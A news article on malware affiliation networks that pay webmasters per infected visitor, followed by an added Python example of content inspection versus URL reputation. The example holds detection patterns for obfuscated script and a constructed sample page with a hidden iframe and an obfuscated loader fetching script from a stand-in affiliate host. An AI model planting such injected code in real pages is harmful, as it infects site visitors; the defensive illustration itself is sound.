Next Big Threat: Affiliation Networks for Hackers

The next big threat to Web security has less to do with phishing and more to do with affiliation networks, according to a recent Web security report.

According to Finjan, a San Jose, Calif.-based Web security provider, hackers are now using sophisticated affiliation networks that provide a hosting model for malicious code. Webmasters and bloggers who embed the malicious code on their sites are then paid according to the number of visitors they infect.

Think Google AdSense -- but for hackers.

Users who run blogs or small Web sites can earn small amounts of money through advertising services such as Google AdSense or DoubleClick.

"You hope somebody will click on those ads to get some pennies," Yuval Ben-Itzhak, CTO of Finjan, said. "But hackers have realized that with their own affiliation programs, they can encourage bloggers and Webmasters to include their hidden ads in exchange for big dollars."

In a malicious code package obtained by Finjan, payouts range from as low as US$15 to as high as $500 per 1,000 infected users, depending on the victims' country. Infecting users in Australia earns affiliates the top rate.

Ben-Itzhak said these hackers can afford to pay such high rates because of the valuable information they harvest from infected users.

"The malicious code includes Trojans and keyloggers that collect data, such as credit card information, which is later sold online for big profits," Ben-Itzhak said. "And because the code is hidden, everyone visiting the site won't suspect it's been compromised and the Webmaster won't be alerted either."

Ronald O'Brien, senior security analyst at anti-spam software provider Sophos, said this form of infection is often seen on Web 2.0 sites such as Wikipedia and MySpace because they allow user editing. However, he said, the techniques have now made their way to traditional Web sites.

"Web sites that don't necessarily promote editing, but because they are architecturally insecure, allow this type of hacking to occur," O'Brien said. "Plus, people who threw up Web sites for the purpose of having a presence on the Web, often did so by using an open-source code, and this has effectively left the keys in the lock for hackers to exploit."

But Ben-Itzhak said pretty much any site can be at risk, as these affiliation-network techniques have been used even in compromises of highly popular Web sites and government domains.

"When we contact the site owners, they are usually surprised and don't believe they are infected," he said. "But when we show them the code they are shocked."

Ben-Itzhak said that hackers who can successfully insert malicious code into highly popular and reputable sites are often in a win-win situation. "Firstly, the high-traffic Web sites lead to more users," he said. "Secondly, these high-traffic sites will never be blocked by URL filtering and reputation services because they are established domains."

This represents a major change from several years ago, when hackers were content with simply changing a Web site's graphics in order to prove they had defaced it, Ben-Itzhak said.

Statistically, he estimated that about 90 percent of the malware code found on the Internet today uses hidden-code techniques, whether on high-traffic sites or through affiliation partnerships.

O'Brien agreed, citing his company's research on the increase in malicious Web content.

"At the beginning of this year, we were seeing on average between 5,000 and 7,000 Web pages a day that were hosting malicious content," O'Brien said. "This past June, just six months later, that number is at 29,000 pages per day."

With these invisible techniques, nothing visible on the page changes, so neither visitors nor the site owner notice anything wrong. Coupled with an affiliation program that pays per infection, that may prove a deadly combination.

"These malware writers are basically introducing business concepts into their operation," O'Brien said. "They are actually measuring the effectiveness of their affiliates and paying them accordingly. We have simply never seen this level of sophistication."

For IT managers wanting to protect employees surfing the Web at work, Ben-Itzhak advises enterprises to add a security product that relies on real-time content inspection rather than URL or reputation attributes.

"I would add a technology that inspects the content as it's about to enter the network and based on the intended behavior of that code," Ben-Itzhak said. "If the code is about to change settings, install software, or delete files on my end-user machine, the code would be blocked on that parameter and not go inside the network."
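To make the distinction concrete, the following sketch is an added illustration, not code from Finjan, Sophos or any product mentioned in this article. It contrasts a reputation-style allowlist with a simple inspection of the page body: the allowlist passes anything served from an established domain, while the content check looks at what is actually in the page. The domains, the two sample pages and the heuristics (a hidden or 1x1 iframe pointing at a third-party host, and inline script using obfuscation calls such as `unescape`) are all constructed assumptions for the example; real inspection engines look at far more than this.

```python
"""Added example: URL-reputation allowlist vs. real-time content inspection.
Not vendor code; domains, pages and heuristics are constructed for illustration."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist standing in for a URL-reputation service (assumption).
TRUSTED_DOMAINS = {"news.example.com", "agency.example.gov"}


def reputation_allows(url: str) -> bool:
    """Reputation-style check: anything served from an established domain passes,
    which is exactly why a compromised high-traffic site sails through."""
    return (urlparse(url).hostname or "") in TRUSTED_DOMAINS


class _PageCollector(HTMLParser):
    """Collects iframe attributes and inline <script> bodies from the HTML."""

    def __init__(self) -> None:
        super().__init__()
        self.iframes: list[dict] = []
        self.scripts: list[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # script content arrives as data chunks
            self.scripts[-1] += data


_HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# Heuristic obfuscation markers for injected loaders (assumption, not a full detector).
_OBFUSCATION = re.compile(
    r"\b(eval|unescape|String\.fromCharCode)\s*\(|document\.write\s*\(.*(%3C|\\x3c|\\u003c)",
    re.I | re.S,
)


def _tiny(value: str) -> bool:
    """True for a width/height attribute of 0 or 1 (e.g. "1" or "1px")."""
    digits = re.sub(r"\D", "", value)
    return digits != "" and int(digits) <= 1


def _iframe_is_hidden(attrs: dict) -> bool:
    if _HIDDEN_STYLE.search(attrs.get("style", "")):
        return True
    return _tiny(attrs.get("width", "")) and _tiny(attrs.get("height", ""))


def inspect_html(page_url: str, html: str) -> list[str]:
    """Content-inspection check: findings about the page body itself,
    independent of the reputation of the domain serving it."""
    parser = _PageCollector()
    parser.feed(html)
    parser.close()
    own_host = urlparse(page_url).hostname or ""
    findings = []
    for attrs in parser.iframes:
        src_host = urlparse(attrs.get("src", "")).hostname or own_host
        if _iframe_is_hidden(attrs) and src_host != own_host:
            findings.append(f"hidden iframe to third-party host {src_host}")
    for body in parser.scripts:
        if _OBFUSCATION.search(body):
            findings.append("obfuscated inline script")
    return findings


def gateway_decision(page_url: str, html: str) -> tuple[str, str]:
    """(reputation verdict, content-inspection verdict) for one fetched page."""
    rep = "allow" if reputation_allows(page_url) else "block"
    insp = "block" if inspect_html(page_url, html) else "allow"
    return rep, insp


# Constructed sample: an established news site with an injected hidden iframe
# and an obfuscated loader; the visible content is untouched.
INFECTED_PAGE_URL = "http://news.example.com/story/123"
INFECTED_PAGE = """<html><body>
<h1>Top story</h1><p>Visible content is unchanged.</p>
<iframe src="http://affiliate.example.net/track?id=42" width="1" height="1"
        style="display:none"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://affiliate.example.net/l.js%22%3E%3C/script%3E'));</script>
</body></html>"""

# Constructed sample: a legitimate page with a visible embedded frame.
CLEAN_PAGE_URL = "http://news.example.com/video"
CLEAN_PAGE = """<html><body>
<iframe src="http://video.example.org/embed/7" width="640" height="360"></iframe>
<script>var page = "video"; console.log(page);</script>
</body></html>"""

if __name__ == "__main__":
    for url, html in ((INFECTED_PAGE_URL, INFECTED_PAGE), (CLEAN_PAGE_URL, CLEAN_PAGE)):
        print(url, gateway_decision(url, html), inspect_html(url, html))
```

Run stand-alone, the infected page comes back as ("allow", "block"): the reputation check waves it through because news.example.com is on the allowlist, while the content check flags the hidden third-party iframe and the obfuscated script. The clean page passes both. The point is not the particular heuristics but where the decision is made: on the bytes about to enter the network rather than on the name of the site that served them.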
